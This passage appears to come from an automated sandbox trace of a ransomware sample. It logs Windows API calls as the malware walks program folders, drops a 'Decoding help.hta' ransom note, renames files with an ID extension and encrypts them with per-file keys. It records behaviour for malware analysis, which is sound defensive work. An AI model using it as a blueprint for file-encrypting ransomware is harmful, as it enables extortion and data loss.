(in: phProv=0x3bcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x3bcfcec*=0x344a348) returned 1 [0059.844] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x3bcfce8 | out: phKey=0x3bcfce8*=0x5a54b0) returned 1 [0059.844] CryptExportKey (in: hKey=0x5a54b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x3bcfbe4, pdwDataLen=0x3bcfce4 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfce4*=0x2c) returned 1 [0059.844] MapViewOfFile (hFileMappingObject=0x89c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4c0) returned 0x2d0000 [0059.859] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x3bcfbe4*, pdwDataLen=0x3bcfcf8*=0x100) returned 1 [0059.859] CryptEncrypt (in: hKey=0x5a54b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x3bcfce4*=0x4c0, dwBufLen=0x4c0 | out: pbData=0x2d0000*, pdwDataLen=0x3bcfce4*=0x4c0) returned 1 [0059.859] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0059.861] CloseHandle (hObject=0x89c) returned 1 [0059.861] CryptDestroyKey (hKey=0x5a54b0) returned 1 [0059.861] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0059.861] SetFilePointerEx (in: hFile=0x898, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.861] WriteFile (in: hFile=0x898, lpBuffer=0x3bcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x3bcfbe4*, lpNumberOfBytesWritten=0x3bcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.292] WriteFile (in: hFile=0x898, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x3bcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x3bcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.292] CloseHandle (hObject=0x898) returned 1 [0061.292] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\calendars.properties.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.292] FindNextFileW (in: hFindFile=0x671630, lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x751d4820, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x751d4820, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x75220ae0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x364427, dwReserved0=0x0, dwReserved1=0x0, cFileName="charsets.jar", cAlternateFileName="")) returned 1 [0061.293] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0061.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0061.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" [0061.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\decoding help.hta")) returned 0x1 [0061.293] lstrcmpiW (lpString1="Decoding help.hta", lpString2="charsets.jar") returned 1 [0061.293] lstrlenW (lpString="charsets.jar") returned 12 [0061.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*" [0061.293] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\*.*") returned 44 [0061.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\", lpString2="charsets.jar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" [0061.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" [0061.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.[ID]g9uZrLhJaygpwRm1[ID]" [0061.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\charsets.jar.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\charsets.jar.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9ec [0061.983] CreateFileMappingA (hFile=0x9ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9f0 [0061.983] CryptAcquireContextA (phProv=0x3bcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 317 os_tid = 0x7e4 [0042.512] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*", lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715f0 [0042.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.515] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.515] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.515] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0042.515] lstrcmpW (lpString1=".", lpString2="10.0") returned -1 [0042.515] lstrcmpW (lpString1="..", lpString2="10.0") returned -1 [0042.515] lstrcmpiW (lpString1="windows", lpString2="10.0") returned 1 [0042.677] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*" [0042.677] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\*.*") returned 40 [0042.677] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\", lpString2="10.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0" [0042.677] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*.*" [0042.677] GlobalMemoryStatus (in: lpBuffer=0x56cfd10 | out: lpBuffer=0x56cfd10) [0042.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115a9598, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6ec [0042.683] CloseHandle (hObject=0x6ec) returned 1 [0042.683] FindNextFileW (in: hFindFile=0x6715f0, lpFindFileData=0x56cfd30 | out: lpFindFileData=0x56cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0042.683] FindClose (in: hFindFile=0x6715f0 | out: hFindFile=0x6715f0) returned 1 Thread: id = 318 os_tid = 0x15c [0042.517] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*", lpFindFileData=0x15d5fd30 | out: lpFindFileData=0x15d5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671670 [0042.518] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.518] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x15d5fd30 | out: lpFindFileData=0x15d5fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.518] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.518] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.518] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x15d5fd30 | out: lpFindFileData=0x15d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x227ce4d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x227ce4d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0042.518] lstrcmpW (lpString1=".", lpString2="Reader_10.0.0") returned -1 [0042.518] lstrcmpW (lpString1="..", lpString2="Reader_10.0.0") returned -1 [0042.518] lstrcmpiW (lpString1="windows", lpString2="Reader_10.0.0") returned 1 [0042.685] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*" [0042.685] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\*.*") returned 36 [0042.685] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\", lpString2="Reader_10.0.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0" [0042.685] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*.*" [0042.685] GlobalMemoryStatus (in: lpBuffer=0x15d5fd10 | out: lpBuffer=0x15d5fd10) [0042.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9599b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x678 [0042.707] CloseHandle (hObject=0x678) returned 1 [0042.707] FindNextFileW (in: hFindFile=0x671670, lpFindFileData=0x15d5fd30 | out: lpFindFileData=0x15d5fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x227ce4d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x227ce4d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0042.707] FindClose (in: hFindFile=0x671670 | out: hFindFile=0x671670) returned 1 Thread: id = 319 os_tid = 0x7c8 [0042.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*", lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f15bdb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f15bdb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671730 [0042.523] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.523] FindNextFileW (in: hFindFile=0x671730, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1ae930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f15bdb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f15bdb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.523] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.523] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.523] FindNextFileW (in: hFindFile=0x671730, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51494530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cartridges", cAlternateFileName="CARTRI~1")) returned 1 [0042.523] lstrcmpW (lpString1=".", lpString2="Cartridges") returned -1 [0042.523] lstrcmpW (lpString1="..", lpString2="Cartridges") returned -1 [0042.523] lstrcmpiW (lpString1="windows", lpString2="Cartridges") returned 1 [0042.716] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.716] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 70 [0042.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="Cartridges" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges" [0042.716] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0042.716] GlobalMemoryStatus (in: lpBuffer=0x530fd10 | out: lpBuffer=0x530fd10) [0042.716] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96ea0f8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6f0 [0042.721] CloseHandle (hObject=0x6f0) returned 1 [0042.721] FindNextFileW (in: hFindFile=0x671730, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150a6b00, ftCreationTime.dwHighDateTime=0x1ca2c5f, ftLastAccessTime.dwLowDateTime=0x516cf9d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x150a6b00, ftLastWriteTime.dwHighDateTime=0x1ca2c5f, nFileSizeHigh=0x0, nFileSizeLow=0x1663968, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdlocal.dll", cAlternateFileName="MSMDLO~1.DLL")) returned 1 [0042.721] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.721] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 70 [0042.721] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" [0042.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\decoding help.hta")) returned 0xffffffff [0042.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0042.734] WriteFile (in: hFile=0x6f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x530fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.735] CloseHandle (hObject=0x6f0) returned 1 [0042.736] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.736] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msmdlocal.dll") returned -1 [0042.736] lstrlenW (lpString="msmdlocal.dll") returned 13 [0042.736] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*" [0042.736] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\*.*") returned 70 [0042.736] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\", lpString2="msmdlocal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" [0042.736] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" [0042.736] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.736] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x68c [0042.745] CreateFileMappingA (hFile=0x68c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x694 [0042.745] CryptAcquireContextA (in: phProv=0x530fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x530fcec*=0x3448478) returned 1 [0046.950] CryptGenKey (in: hProv=0x3448478, Algid=0x6610, dwFlags=0x1, phKey=0x530fce8 | out: phKey=0x530fce8*=0x6717b0) returned 1 [0046.950] CryptExportKey (in: hKey=0x6717b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x530fbe4, pdwDataLen=0x530fce4 | out: pbData=0x530fbe4*, pdwDataLen=0x530fce4*=0x2c) returned 1 [0046.950] MapViewOfFile (hFileMappingObject=0x694, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x6110000 [0047.018] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x530fbe4*, pdwDataLen=0x530fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x530fbe4*, pdwDataLen=0x530fcf8*=0x100) returned 1 [0047.018] CryptEncrypt (in: hKey=0x6717b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6110000, pdwDataLen=0x530fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0x6110000*, pdwDataLen=0x530fce4*=0x100000) returned 1 [0049.480] UnmapViewOfFile (lpBaseAddress=0x6110000) returned 1 [0049.563] CloseHandle (hObject=0x694) returned 1 [0049.563] CryptDestroyKey (hKey=0x6717b0) returned 1 [0049.563] CryptReleaseContext (hProv=0x3448478, dwFlags=0x0) returned 1 [0049.563] SetFilePointerEx (in: hFile=0x68c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.563] WriteFile (in: hFile=0x68c, lpBuffer=0x530fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x530fbe4*, lpNumberOfBytesWritten=0x530fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.062] WriteFile (in: hFile=0x68c, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x530fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x530fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.062] CloseHandle (hObject=0x68c) returned 1 [0060.426] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.784] FindNextFileW (in: hFindFile=0x671730, lpFindFileData=0x530fd30 | out: lpFindFileData=0x530fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc50000, ftCreationTime.dwHighDateTime=0x1ca2c5f, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, 